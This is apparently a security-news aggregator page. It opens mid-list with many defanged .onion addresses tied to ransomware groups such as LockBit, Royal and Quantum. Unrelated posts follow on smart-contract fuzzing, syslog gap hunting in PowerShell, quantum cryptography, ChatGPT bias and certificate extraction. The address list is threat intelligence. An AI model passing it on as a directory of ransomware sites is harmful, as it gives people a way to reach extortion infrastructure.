zdffgs5z4pbbsywnzsbdguqd.onionhxxp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onionhxxp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onionhxxp://lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onionhxxp://lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onionhxxp://lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onionhxxp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onionhxxp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onionhxxp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onionhxxp://lockbitfile2tcudkcqqt2ve6btssyvqwlizbpv5vz337lslmhff2uad.onionhxxp://lockbitnotexk2vnf2q2zwjefsl3hjsnk4u74vq4chxrqpjclfydk4ad.onionhxxp://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onionhxxp://lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd.onionhxxp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onionhxxp://lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad.onionhxxp://lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd.onionhxxp://lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd.onionhxxp://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionhxxp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onionhxxp://lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd.onionhxxp://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onionhxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onionhxxp://mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd.onionhxxp://mhdehvkomeabau7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wlqd.onionhxxp://midasbkic5eyfox4dhnijkzc7v7e4hpmsb2qgux7diqbpna4up4rtdad.onionhxxp://ml3mjpuhnmse4kjij7ggupenw34755y4uj7t742qf7jg5impt5ulhkid.onionhxxp://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onionhxxp://mrdxtxy6vqeqbmb4rvbvueh2kukb3e3mhu3wdothqn7242gztxyzycid.onionhxxp://msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onionhxxp://n3twormruynhn3oetmxvasum2miix2jgg56xskdoyihra4wthvlgyeyd.onionhxxp://nalr2uqsave7y2r235am5jsfiklfjh5h4jc5nztu3rzvmhklwt5j6kid.onionhxxp://nclen75pwlgebpxpsqhlcnxsmdvpyrr7ogz36ehhatfmkvakeyden6ad.onionhxxp://nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onionhxxp://obzuqvr5424kkc4unbq2p2i67ny3zngce3tbdr37nicjqesgqcgomfqd.onionhxxp://omegalock5zxwbhswbisc42o2q2i54vdulyvtqqbudqousisjgc7j7yd.onionhxxp://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onionhxxp://oyarbnujct53bizjguvolxou3rmuda2vr72osyexngbdkhqebwrzsnad.onionhxxp://ozsxj4hwxub7gio347ac7tyqqozvfioty37skqilzo2oqfs4cw2mgtyd.onionhxxp://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onionhxxp://pysa2bitc5ldeyfak4seeruqymqs4sj5wt5qkcq7aoyg4h2acqieywad.onionhxxp://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onionhxxp://qkbbaxiuqqcqb5nox4np4qjcniy2q6m7yeluvj7n5i5dn7pgpcwxwfid.onionhxxp://quantum445bh3gzuyilxdzs5xdepf3b7lkcupswvkryf3n7hgzpxebid.onionhxxp://r6d636w47ncnaukrpvlhmtdbvbeltc6enfcuuow3jclpmyga7cz374qd.onionhxxp://ramp4u5iz4xx75vmt6nk5xfrs5mrmtokzszqxhhkjqlk7pbwykaz7zid.onionhxxp://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onionhxxp://ranionv3j2o7wrn3um6de33eccbchhg32mkgnnoi72enkpp7jc25h3ad.onionhxxp://ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad.onionhxxp://rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad.onionhxxp://relic5zqwemjnu4veilml6prgyedj6phs7de3udhicuq53z37klxm6qd.onionhxxp://rgleaktxuey67yrgspmhvtnrqtgogur35lwdrup4d3igtbm3pupc4lyd.onionhxxp://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onionhxxp://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onionhxxp://royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onionhxxp://royal4ezp7xrbakkus3oofjw6gszrohpodmdnfbe5e4w3og5sm7vb3qd.onionhxxp://rwiajgajdr4kzlnrj5zwebbukpcbrjhupjmk6gufxv6tg7myx34iocad.onionhxxp://santat7kpllt6iyvqbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad.onionhxxp://sbc2zv2qnz5vubwtx3aobfpkeao6l4igjegm3xx7tk5suqhjkp5jxtqd.onionhxxp://solidb2jco63vbhx4sfimnqmwhtdjk4jbbgq7a24cmzzkfse4rduxgid.onionhxxp://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onionhxxp://ssq4zimieeanazkzc5ld4v5hdibi2nzwzdibfh5n5w4pw5mcik76lzyd.onionhxxp://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx6o77yvmpwt7gklffqd.onionhxxp://sushlnty2j7qdzy64qnvyb6ajkwg7resd3p6agc2widnawodtcedgjid.onionhxxp://t2tqvp4pctcr7vxhgz5yd5x4ino5tw7jzs3whbntxirhp32djhi7q3id.onionhxxp://tdoe2fiiamwkiadhx2a4dfq56ztlqhzl2vckgwmjtoanfaya4kqvvvyd.onionhxxp://u67aylig7i6l657wxmp274eoilaowhp3boljowa6bli63rxyzfzsbtyd.onionhxxp://vbfqeh5nugm6r2u2qvghsdxm3fotf5wbxb5ltv6vw77vus5frdpuaiid.onionhxxp://vbmisqjshn4yblehk2vbnil53tlqklxsdaztgphcilto3vdj4geao5qd.onionhxxp://veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id.onionhxxp://vfokxcdzjbpehgit223vzdzwte47l3zcqtafj34qrr26htjo4uf3obid.onionhxxp://vqifktlreqpudvulhbzmc5gocbeawl67uvs2pttswemdorbnhaddohyd.onionhxxp://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad.onionhxxp://wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onionhxxp://wemo2ysyeq6km2nqhcrz63dkdhez3j25yw2nvn7xba2z4h7v7gyrfgid.onionhxxp://wj3b2wtj7u2bzup75tzhnso56bin6bnvsxcbwbfcuvzpc4vcixbywlid.onionhxxp://wm6mbuzipviusuc42kcggzkdpbhuv45sn7olyamy6mcqqked3waslbqd.onionhxxp://wmp2rvrkecyx72i3x7ejhyd3yr6fn5uqo7wfus7cz7qnwr6uzhcbrwad.onionhxxp://wobpitin77vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onionhxxp://ws3dh6av66sjbxxkjpw5ao3wqzmtejnkzheswm4dz5rrwvular7xvkqd.onionhxxp://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionhxxp://x2miyuiwpib2imjr5ykyjngdu7v6vprkkhjltrk4qafymtawey4qzwid.onionhxxp://xembshruusobgbvxg4tcjs3jpdnks6xrr6nbokfxadcnlc53yxir22ad.onionhxxp://xfr3txoorcyy7tikjgj5dk3rvo3vsrpyaxnclyohkbfp3h277ap4tiad.onionhxxp://xingnewj6m4qytljhfwemngm7r7rogrindbq7wrfeepejgxc3bwci7qd.onionhxxp://xqkz2rmrqkeqf6sjbrb47jfwnqxcd4o2zvaxxzrpbh2piknms37rw2ad.onionhxxp://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid.onionhxxp://yeuajcizwytgmrntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid.onionhxxp://yq43odyrmzqvyezdindg2tokgogf3pn6bcdtvgczpz5a74tdxjbtk2yd.onionhxxp://z6mikrtphid5fmn52nbcbg25tj57sowlm3oc25g563yvsfmygkcxqbyd.onionhxxp://z6vidveub2ypo3d3x7omsmcxqwxkkmvn5y3paoufyd2tt4bfbkg33kid.onionhxxp://z6wkgghtoawog5noty5nxulmmt2zs7c3yvwr22v4czbffdoly2kl4uad.onionhxxp://zeonrefpbompx6rwdqa5hxgtp2cxgfmoymlli3azoanisze33pp3x3yd.onionhxxp://zj2ex44e2b2xi43m2txk4uwi3l55aglsarre7repw7rkfwpj54j46iqd.onionhxxp://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onionhxxp://zohlm7ahjwegcedoz7lrdrti7bvpofymcayotp744qhx6gjmxbuo2yid.onionhxxp://zqaflhty5hyziovsxgqvj2mrz5e5rs6oqxzb54zolccfnvtn5w2johad.onionStay tuned!
Categorías: Security Posts

TEST-2022 Talos Year in Review Report-TEST2

Cisco Talos - Jue, 2022/12/08 - 17:38
This is the excerpt for the hero post
Categorías: Security Posts

Hybrid fuzzing: Sharpening the spikes of Echidna

By Tom Malcolm, University of Queensland, Australia Smart contract fuzzing is an effective bug-finding technique that is largely used at Trail Of Bits during audits. During my internship at Trail of Bits, I contributed to expand our fuzzing capabilities by working on Hybrid Echidna, a “hybrid fuzzer” that couples our smart contract fuzzer, Echidna, with our symbolic execution framework, Maat, to improve the process of finding bugs. While Echidna is a great tool, it still struggles to discover some bugs. With Hybrid Echidna, we enhance the process to find even more! Echidna is a property-based fuzzer built by Trail of Bits that is widely used in smart contract bug hunting. (See its README for a list of notable uses of Echidna and some of the vulnerabilities it has found.) It lies in the category of “smart fuzzers,” which use the ABI of a contract and perform static analysis of its source code to make decisions on how best to generate input data. In this post, we’ll look at an example of a contract with bugs that can be triggered only with very specific 256-bit integer inputs (e.g. 0xee250cacdb8de774585208b1e85445fca3bd09da95683133ed06742b71ec2434). We will first show how Echidna, which uses random fuzzing techniques, struggles to discover the bugs. We’ll then examine how Hybrid Echidna improves upon traditional random fuzzing and see the results for ourselves! The problem The following contract contains two bugs (represented as assertion failures). Triggering the bugs requires finding inputs that consist in specific 256-bit integers, which are not hardcoded into the contract’s code. The chance of randomly finding the right input is 1/115792089237316195423570985008687907853269984665640564039457584007913129639936 — which means that the bugs that are impossible to find by relying on random fuzzing only. pragma solidity ^0.7.1; contract VulnerableContract { function func_one(int128 x) public pure { if (x / 4 == -20) { assert(false); // BUG } } function func_two(int128 x) public pure { if ((x >> 30) / 7 == 2) { assert(false); // BUG } } } When we run Echidna on the contract (by executing the command echidna VulnerableContract.sol --test-mode assertion), it locally saves certain information about its findings. A summary is displayed in the friendly ncurses-esque interface that it greets us with, as shown below: Although Echidna identified three “interesting” inputs and added them to the fuzzing corpus, none of them resulted in an assertion failure (i.e., a bug). In other words, Echidna failed to trigger the bugs in the contract. What happened is that Echidna couldn’t find inputs that would meet the conditions required to trigger the buggy execution paths. This is understandable, as the bug conditions are arithmetic equations, and Echidna can only be so smart when it comes to solving such equations. Looking at the coverage files generated by Echidna, we can clearly see the code paths that weren’t covered: | pragma solidity ^0.7.1; *r | | contract VulnerableContract { | * | function func_one(int128 x) public pure { * | if (x / 4 == -20) { | assert(false); // BUG | } | } | * | function func_two(int128 x) public pure { * | if ((x >> 30) / 7 == 2) { | assert(false); // BUG | } | } | } Echidna can successfully find bugs (and has on many occasions), and at the end of the day, a bug found is a bug found. However, as this example shows, its results could be improved. How, you ask? Well, if only there were a mutation of the tool, some Frankenstein version that combined Echidna with something that could sharpen its ability, forming one super bug-finder—something like a Hybrid Echidna. Hybrid Echidna to the rescue Note: If you’d like to follow along here, install the Optik suite of tools by running the following command: pip install optik-tools Hybrid Echidna is part of Optik, a new suite of tools for analysis of Ethereum smart contracts. Optik is intended to comprise both standalone tools and tools that improve upon existing ones (typically fuzzers) for dynamically analyzing smart contracts. So far, its sole tool is Hybrid Echidna, which improves upon Echidna by coupling it with Maat, a symbolic execution framework also developed in-house by Trail of Bits. At the beginning of the summer, the Hybrid Echidna codebase was a minimal one that simply ran Echidna. Now, Hybrid Echidna is a complete tool (albeit one still under development) that consistently improves upon Echidna. How does it work? At a high level, Hybrid Echidna simply runs Echidna multiple times, interweaving those runs with symbolic analysis to generate new fuzzing inputs. A more in-depthprocess for fuzzing a contract now looks like this:
  1. Execute an initial run of Echidna to collect a fuzzing corpus.
  2. For every unique input that is found, symbolically execute the contract with that input and record its coverage.
  3. Review the coverage information for any missed paths.
  4. Use Maat to solve inputs for those paths, and record any new inputs that would lead to the execution of a missed path.
  5. Repeat the process until there are no more inputs that can be found.
So Hybrid Echidna takes the data that Echidna finds, uses Maat to figure out how to change its input to reach difficult paths, and then fuzzes the program again (with the newfound inputs) until it can’t improve upon the findings. Think of Echidna as a contestant on Who Wants to Be a Millionaire?: when Echidna needs a hand, it can “phone a friend” in Maat (and make an unlimited number of calls). Show me! Let’s revisit the contract we looked at earlier—the one with two bugs that Echidna overlooked—and see how Hybrid Echidna fares. We use the following command to run Hybrid Echidna: hybrid-echidna VulnerableContract.sol --test-mode assertion --corpus-dir hybrid_echidna_output --contract VulnerableContract Upon running Hybrid Echidna, we are greeted with another friendly UI that provides insight into its performance. This includes timing information and the following key takeaways:
  • Hybrid Echidna found seven unique inputs (five through fuzzing and two through symbolic execution).
  • Two of those inputs resulted in assertion failures (i.e., bugs).
  • The assertion failures occurred in the func_one and func_two functions
We can quickly verify the inputs that triggered these failures (which are shown in the “Results” section). Take Hybrid Echidna’s input to func_one, 15032385536, and recall that a result of 2 indicates an assertion failure: $ python -c 'print((15032385536 >> 30) // 7)' 2 As we can see, Hybrid Echidna found random input that meets the very specific condition in func_one, improving upon Echidna’s performance. In other words, it found more bugs! What’s next? Despite its current limitations (such as its lack of support for symbolic keccak operations and its inability to account for gas usage), we are already seeing promising results with Hybrid Echidna. These results reinforce our confidence in our approach to fuzzing and make us hopeful that we’ll have even more exciting results to share in the future. Optik is still under active development. Going forward, we plan to improve the project’s symbolic executor and, more importantly, increase Hybrid Echidna’s scalability by testing it on real-world codebases. Our end goal is for every engineer at Trail of Bits to use Hybrid Echidna when auditing smart contracts. Try installing Optik and testing out Hybrid Echidna on the VulnerableContract.sol example (or on your own contracts), and let us know what you think!
Categorías: Security Posts

Popular HR and Payroll Company Sequoia Discloses a Data Breach

Wired: Security - Jue, 2022/12/08 - 15:00
The company, which works with hundreds of startups, said it detected unauthorized access to personal data, including Social Security numbers.
Categorías: Security Posts

Finding Gaps in Syslog - How to find when nothing happened, (Wed, Dec 7th)

SANS Internet Storm Center, InfoCON: green - Jue, 2022/12/08 - 14:41
I recently got a call from a client, they had an outage that required a firewall reboot, but couldn't give me an exact clock time.  They were looking for anything in the logs just prior to that reboot that might indicate a carrier issue, as they had experienced a few outages like this recently. This was a Cisco ASA firewall, so we of course had logs - LOTS of logs - 2-3-4GB per day, depending on the day, with dozens or more events per second, so way more than is practical to find that "gap" in the logs that you'll see from a device reboot.   What I needed was to find that gap in the logs so that I'd know where to look for problems (right before that).  So how do we find "nothing happens" in a log file?  First, let's look at a typical log entry: 2022-12-07 00:00:00       Local7.Info    172.16.200.1    Dec 07 2022 00:00:00: %ASA-6-302020: Built .... So you can see, we have a date/time stamp (from the syslog server), the syslog facility, source IP, a date/time stamp (from the device), the message code (ie the Cisco assigned identifier for this message type), then the message itself in text.  The first date / time stamp are separated by a space, then a tab between that and the facility, and another tab between the facility and the souce IP address.  From there on everything is delimited by spaces. Since I'm looking for a gap in the timestamps, I can just use that first field, so this gets easy!  Let's use the "cut" command to parse out unique seconds and unique minutes cat 172.016.200.001-2022-12-07.txt | cut -f 1 | sort | uniq > seconds.txt if your syslog is on windows then you'll likely use "type" instead of "cat".   For a firewall this is too much information though, you'll usually have multiple events per second so looking for a gap will give you white-line-fever in no time.  Lets leave off the seconds field  and look for unique minutes instead: cat 172.016.200.001-2022-12-07.txt | cut -f 1 | cut -d ":" -f 1,2 | sort | uniq > minutes.txt Note the two different uses of cat - the first one pulls the first field (delimited by a tab), which is the date+time.  The second one uses the colon for a delimiter, so the first field is the date+hour, the second field is the minutes. Since the first timestamp is followed by a tab, we don't need to tell the first cut command what delimiter to use.  Log records should all be sequential, especially since we're parsing the timestamp from the syslog server,but I put a "sort" in their anyway, just on principle ("sort | uniq" is a string that should be stored in your fingers). Since it was ~11am at the time, I took the "minutes.txt" file, opened it in notepad, went to the bottom and scrolled up a few, and found a gap almost right away of just over 1 hour, from 8:37 to 9:37.  If the log was across a longer time period I might have dumped it into Excel and looked for non-sequential records with some cell math.  Or you could use a powershell snip like the one below: First, create a header line and dump it to a file (note the tab characters `t).  The header row gets really handy, it makes importing a delimited file way easier, as this will auto-name the fields.  This is also a handy thing to keep, if you are parsing these logs frequently keeping various header files around is a time-saver: $header = "timestamp`tfacility`tsource_ip`tmessage"
$header > import.txt next, shell out to a command prompt and append the syslog file to the header, for later import cmd
type fw.txt >> import.txt
exit Now import the file, use the tab ("`t") as the initial delimeter $syslog = import-csv -Delimiter "`t" -path .\import.txt Look at a record: $syslog[5] timestamp           facility    source_ip    message
---------           --------    ---------    -------
2022-12-07 00:00:00 Local7.Info 172.16.200.1 Dec 07 2022 00:00:00: %ASA-6-305011: Built dynamic UDP translation from. Perfect, let's process the file now: #Use the year value to verify each record
$year = 2022 # let's look for a minimum gap of 3 minutes
$difference = 3
# set an initial value to the "previous record" - cast the timestamp string to the "datetime" type
$previous = [datetime]($syslog[0].timestamp) foreach ($record in $syslog.timestamp) {
   # only process properly formed records (that start with YYYY) - records that wrap with CRLF will error out so discard them here
   if($record.substring(0,4) -eq $year) {
       $current = [datetime]($record)
       # totalminutes will convert days, hours, minutes etc difference to just minutes
       $gap = ($current - $previous).totalminutes
       if ($gap -ge $difference) {
           write-host $gap "minute gap Identified between" $previous and $current
           $p = $previous
           $c = $current
       }
       $previous = $current
    }
} When we run this, we get one line of output: 70.05 minute gap Identified between 12/7/2022 8:27:25 AM and 12/7/2022 9:37:28 AM Perfect, just what I was looking for! Since they power cycled this box during the problem, I was looking for a ~4 minute gap (a typical boot time of an ASA firewall), then I was going to look at events immediately before that gap.  But what I saw instead was 100% normal activity, followed by a 1 hour, 10 minute gap where no events happened, then normal activity again.  So in this case no carrier issue - if the uplink was dead we'd have at least seen internal traffic trying to get out. What was the problem? I'm suspecting a loose power cable or a flaky power supply, no definitive answer yet.  This box is running the same OS as dozens of other ASAs I work with, and there are no OS type errors, so it really does look like hardware.  Plus this unit wasn't built as a redundant pair and this model doesn't have a redundant power supply - that's all getting fixed sometime soon! Have you used a fun log forensics trick you can share?  Especially if you have a handy script, or if the root cause was a letdown like this one?  Please, use our comment form to share! ===============
Rob VandenBrink
rob@coherentsecurity.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categorías: Security Posts

Elon Musk’s Twitter Files Are a Feast for Conspiracy Theorists

Wired: Security - Jue, 2022/12/08 - 14:00
From QAnon influencers to @catturd, the very online right sees exactly what they want to see in the CEO’s orchestrated disclosure.
Categorías: Security Posts

What is YTQ?

AlienVault Blogs - Jue, 2022/12/08 - 13:00
What is CRQC? Widespread interest in quantum computing continues to expand as computer innovators, scientists, and technology industry leaders vie to position themselves at the top of the pack for quantum computing prowess.  As the buzz continues, I’d like to discuss Cryptographically Relevant Quantum Computers (CRQC) in simple terms. A CRQC uses quantum mechanical phenomena to quickly solve difficult mathematical problems a classical computer cannot or would take years to complete; additionally, if or when a CRQC is achieved, it will have the calculation skill to break today’s public-key cryptography leaving web based digital communications compromised.  One of the first lessons I learned from a cybersecurity architect is to never do the same thing when it comes to cybersecurity. Cybersecurity practices should continually change according to evolving threat applications and vulnerabilities. Nonetheless, for the last 30 plus years the US has relied on public-key cryptography to secure digital data globally. With the date looming for CRQC to hit the market, the US is now in a race to replace a decades old standard of encryption to protect vital data. What is Y2Q? Years to Quantum (Y2Q) refers to the unknown number of years before there is a CRQC. Quantum systems are now being used and select organizations are providing cloud-based access to these systems for testing and research purposes; however, quantum computers currently in use are not CRQC.  From this point forward we will refer to quantum systems that emerge post Y2Q as CRQC. As quantum computing evolves and the technology for CRQC comes to reality, no single entity can pinpoint a precise date when CRQC will make an impact on the worlds IT infrastructure.  Speculation ranges from five to 25 years and various organizations have developed Y2Q countdown clocks, arbitrarily specifying date ranges up to 2034, as the deadline by which the world must upgrade its IT infrastructure to meet the Y2Q threat. Conclusion As the world awaits Y2Q, government entities and cybersecurity managers, along with medical, telecom and bank industries are generating play books/plans and contingencies to defend against CRQC. While CRQC will pose a considerable threat to enterprises in the future, a wide variety of contingencies are emerging to develop advanced CRQC solutions to alleviate the threat. While the full range of quantum computer applications steadily grows, it is nevertheless clear that America’s continued technological and scientific leadership will be subject to its ability to sustain a competitive advantage in quantum computing information and systems. Critical infrastructure, security protocols, internet banking in addition to military and civilian communications could be threatened. Is the United States postured to solidify its role as a world leader in its approach to Y2Q?
Categorías: Security Posts

ChatGPT: "Los hackers malos, los tenistas hombres y no sé qué es ChatGPT"

Un informático en el lado del mal - Jue, 2022/12/08 - 11:03
Hoy tenía ganas de probar en un ratito ChatGPT, el modelo conversacional creado sobre OpenAI. Quería ver algunas cosas de esas de las que os he hablando tantas veces con la Inteligencia Artificial, como los sesgos de género por defecto, las traducciones sesgadas, o la visión que tienen del mundo de los hackers. Así que esta mañana me he puesto con ello.
Figura 1: ChatGPT: "Los hackers malos,  los tenistas hombres y no sé qué es ChatGPT"
La conversación que he tenido ha sido bastante larga, en Español y en Inglés, así que os he sacado algunas de las respuestas que ha dado a algunas preguntas muy sencillas. Como veréis, nos queda mucho por educar todavía si queremos meter estos modelos de AI a hacer tareas que afecten a la vida de las personas.
Sobre los "hackers"
Lo primero que he preguntado ha sido sobre los hackers, a ver qué me decía de ellos, pero en la primera pregunta, al querer saber quién es el mejor hacker del mundo, ya te dice que eso de usar "mejor" para algo malo como ser "hacker" que no.
Figura 2: No debemos enfocarnos en quién es el mejor hacker
Por si había dudas, se lo he preguntado también en Español, a ver si en nuestra lengua, donde tenemos una acepción positiva del término hacker trataba de forma diferente a los hackers, pero parece que está enrocado en ese pensamiento.
Figura 3: Igual, no centremos en quién es el mejor hacker del mundo
Como no me había gustado la respuesta, le he preguntado por qué piensa eso, y le he explicado la diferencia. 
Figura 4: No es lo mismo hacker que cibercriminal
Sorprendentemente en su contestación me da la razón, así que parece que no tiene conciencia unificada o ideas claras, sino respuestas elegidas a preguntas diferentes. Vamos, que lo mismo no pasa un psicoténcico.
Sesgo de género por defecto en deporte
Esta es una prueba básica para detectar en un modelo de IA conversacional si tiene un sesgo de género por defecto. Se trata de preguntarle por el mejor de un deporte sin decirle si es hombre o mujer y ver si tiene contemplado o no la respuesta multi-género.
Figura 5: Mejores tenistas (Sesgo de género masculino)
Para dejar más claro que tiene el sesgo de género por defecto, en el mundo del tenis es muy sencillo, porque podemos preguntar por quién tiene más Grand Slams, que es Serena Williams con 23,  pero vemos que sale Roger Federer con 20. Así que tiene sesgo de género por defecto y está desactualizada.
Figura 6: Sesgo de genero masculino por defecto y desactualizado
Basta con preguntar por quién ganó el último Roland Garros y ver que nos devuelve el dato del año 2021, así que ya sabéis qué fecha tiene el dataset de entrenamiento más o menos.
Figura 7: Datos del año 2021
Una mera curiosidad para saber qué resultados esperar de las pruebas. Y por último, como me había quedado con el tema de los hackers un poco "así, así", le insistí.
¿Sabes quién creó ChatGPT?
Le pregunté si sabía que ChatGPT había sido creado por grandes hackers, a ver qué me decía al respecto. Y el resultado es que no tiene información sobre ChatGPT, que sólo es un modelo de lenguaje grande entrenado por OpenAI.
Figura 8: No me viene nada por ChatGPT
Al final, estos modelos de IA entrenados con datos masivos para conversación estarán en nuestra vida dentro de muy poco. ChatGPT es una buena forma de probarlos y ver todo lo que aún hay que mejorar. Google y su LaMDA va a ser una plataforma a tener en cuenta en el futuro.
¡Saludos Malignos!
Autor: Chema Alonso (Contactar con Chema Alonso)  


Sigue Un informático en el lado del mal RSS 0xWord
- Contacta con Chema Alonso en MyPublicInbox.com
Categorías: Security Posts

ISC Stormcast For Thursday, December 8th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=8282, (Thu, Dec 8th)

SANS Internet Storm Center, InfoCON: green - Jue, 2022/12/08 - 06:55
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categorías: Security Posts

Wireshark 4.0.2 and 3.6.10 released, (Wed, Dec 7th)

SANS Internet Storm Center, InfoCON: green - Jue, 2022/12/08 - 00:21
Wireshark has released updates for both the 3.6 and 4.0 lines. There appear to be quite a few bug fixes, but no vulnerability fixes. [1] https://www.wireshark.org/docs/relnotes/wireshark-4.0.2.html
[2] https://www.wireshark.org/docs/relnotes/wireshark-3.6.10.html
[3] https://www.wireshark.org/download.html ---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categorías: Security Posts

Extracting Certificates For Defender

Didier Stevens - Lun, 2022/12/05 - 02:00
A colleague asked me for help with extracting code signing certificates from malicious files, to add them to Defender’s block list. The procedure involves right-clicking the EXE in Windows Explorer, selecting properties to view the digital signature, and so on … But I don’t like procedures where one has to click on malware. So I looked for a PowerShell command, and found this. Get-AuthenticodeSignature .\malware.exe.vir | Select-Object -ExpandProperty SignerCertificate | Export-Certificate -Type CERT -FilePath SignerCertificate.cer
Categorías: Security Posts

Rebooting

root labs rdist - Jue, 2022/11/17 - 22:59
I’ve recently had some time to catch up on reading and research. I’ve decided to start writing again here about cryptography, embedded systems, and security. Recently, I enjoyed being on the “Security, Cryptography, Whatever” podcast. I got a chance to cover some past projects and how the fields of cryptography and security have changed over the past 25 years.
  • Part 1 (1997 – 2007): Netscape, FIPS-140, Cryptography Research, satellite TV piracy wars, Blu-ray content protection wars
  • Part 2: (2008 – 2016): toll systems & smart meter hacking, designing a secure payment terminal (one of my favorite design projects), binary similarity analysis for app stores startup (SourceDNA), and the possible future of high assurance designs
I hope you enjoy hearing these stories as much as I did retelling them. More to come soon!
Categorías: Security Posts

Healthcare Industry Leads the Way in Fixing Software Flaws

Zero in a bit - Jue, 2022/09/22 - 22:06
The healthcare industry is transforming patient care through software, from 24/7 digital patient portals, to AI-fueled medical research, and everything in between. As innovation reaches new heights, how does healthcare stack up against other sectors in terms of software security flaws and the ability to remediate them? Our latest State of Software Security Report found that 77 percent of applications in this sector have vulnerabilities – a slight uptick from last year’s 75 percent – with 21 percent considered high severity. Healthcare takes first place for fixing flaws at 27 percent. Developers in the space should be applauded for tackling complex authentication issues and insecure dependencies with success over the last 12 months. When clocking the time it takes to remediate flaws found by static analysis (SAST), dynamic analysis (DAST), and software composition analysis (SCA), healthcare organizations fall right in the middle of the pack. It’s also worth mentioning that healthcare…
Categorías: Security Posts
Distribuir contenido